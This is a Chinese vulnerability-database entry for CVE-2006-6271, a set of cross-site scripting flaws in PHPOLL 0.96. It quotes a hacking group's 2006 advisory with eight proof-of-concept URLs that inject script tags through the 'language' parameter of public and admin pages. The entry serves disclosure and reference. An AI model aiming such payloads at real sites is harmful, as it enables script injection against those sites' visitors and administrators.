PHPOLL 多个跨站脚本攻击(XSS)漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192673 漏洞类型 跨站脚本
发布时间 2006-12-04 更新时间 2006-12-04
CVE编号 CVE-2006-6271 CNNVD-ID CNNVD-200612-039
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/82217
https://cxsecurity.com/issue/WLB-2006120032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-039
|漏洞详情
PHPOLL存在多个跨站脚本攻击(XSS)漏洞。远程攻击者可以借助对(1)index.php,(2)info.php和对admin/下的(3)index.php,(4)votanti.php,(5)risultati_config.php,(6)modifica_band.php,(7)band_editor.php和(8)config_editor.php的语言参数来注入任意web脚本或HTML。
|漏洞EXP
"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """ 
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """ 
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
        Xmor$ DigitaL Hacking TeaM

# PHPOLL  => 0.96 Cross Site Scripting
# Script.............. : PHPOLL
# Discovered by.... : the_Edit0r	
# Location .......... : Iran
# Class..............  : Xss
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r 
#      D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

# proof Of Concept : 
 Www.Site.coM/[path]/index.php?language="><script>alert('Xmors')</script>
<
 Www.Site.coM/[path]/info.php?language="><script>alert('Xmors')</script><

Www.Site.coM/[path]/phpoll_files/admin/index.php?language="><script>aler
t('Xmors')</script><
 Www.Site.coM/[path]/phpoll_files/admin/votanti.php?language="><script>al
ert('Xmors')</script><
 Www.Site.coM/[path]/phpoll_files/admin/risultati_config.php?language="><
script>alert('Xmors')</script><
 Www.Site.coM/[path]/phpoll_files/admin/modifica_band.php?language="><scr
ipt>alert('Xmors')</script><
 Www.Site.coM/[path]/phpoll_files/admin/band_editor.php?language="><scrip
t>alert('Xmors')</script><
 Www.Site.coM/[path]/phpoll_files/admin/config_editor.php?language="><scr
ipt>alert('Xmors')</script><

#Contact me : the_3dit0r[at]Yahoo[dot]coM
|受影响的产品
Phpoll Phpoll 0.96
|参考资料

来源:BUGTRAQ
名称:20061119PHPOLL=>0.96CrossSiteScripting
链接:http://www.securityfocus.com/archive/1/archive/1/452093/100/200/threaded
来源:XF
名称:phpoll-language-xss(30426)
链接:http://xforce.iss.net/xforce/xfdb/30426
来源:SREASON
名称:1960
链接:http://securityreason.com/securityalert/1960